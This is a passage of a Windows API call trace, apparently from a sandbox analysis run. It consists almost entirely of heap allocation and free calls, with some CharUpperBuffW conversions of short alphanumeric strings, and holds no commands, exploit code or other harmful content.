0x2aaaae0 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0206.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0206.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0206.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad68 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0206.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0206.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0206.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac30 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0206.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0206.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0206.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0206.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0206.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad08 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0206.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad08 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaade0 [0206.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0206.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0206.200] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0206.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0206.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaae0 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0206.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0206.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0206.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0206.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0206.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0206.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0206.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0206.201] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0206.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0206.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0206.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0206.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0206.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0206.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0206.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0206.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0206.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0206.201] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0206.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaacd8 [0206.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741a8 [0206.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0206.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0206.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabd0 [0206.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0206.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0206.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0206.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0206.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0206.202] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0206.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0206.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0206.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0206.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0206.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0206.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0206.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0206.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0206.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0206.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0206.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741a8 | out: hHeap=0x2af0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0206.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0206.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0206.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae28 [0206.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0206.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0206.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0206.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0206.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0206.204] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0206.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaad98 [0206.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741a8 [0206.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0206.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0206.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac00 [0206.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0206.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabb8 [0206.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0206.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0206.204] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0206.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0206.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0206.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0206.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0206.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0206.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0206.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0206.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0206.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0206.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0206.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0206.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab88 [0206.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0206.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0206.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0206.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0206.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0206.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0206.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741a8 | out: hHeap=0x2af0000) returned 1 [0206.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0206.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0206.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0206.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0206.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0206.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0206.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0206.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0206.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0206.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0206.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0206.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0206.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0206.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0206.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0206.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0206.206] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0206.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaac30 [0206.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0206.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0206.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0206.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0206.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac60 [0206.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0206.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae28 [0206.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0206.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0206.207] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0206.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0206.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0206.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0206.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0206.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0206.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0206.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0206.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0206.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0206.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0206.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0206.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0206.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) 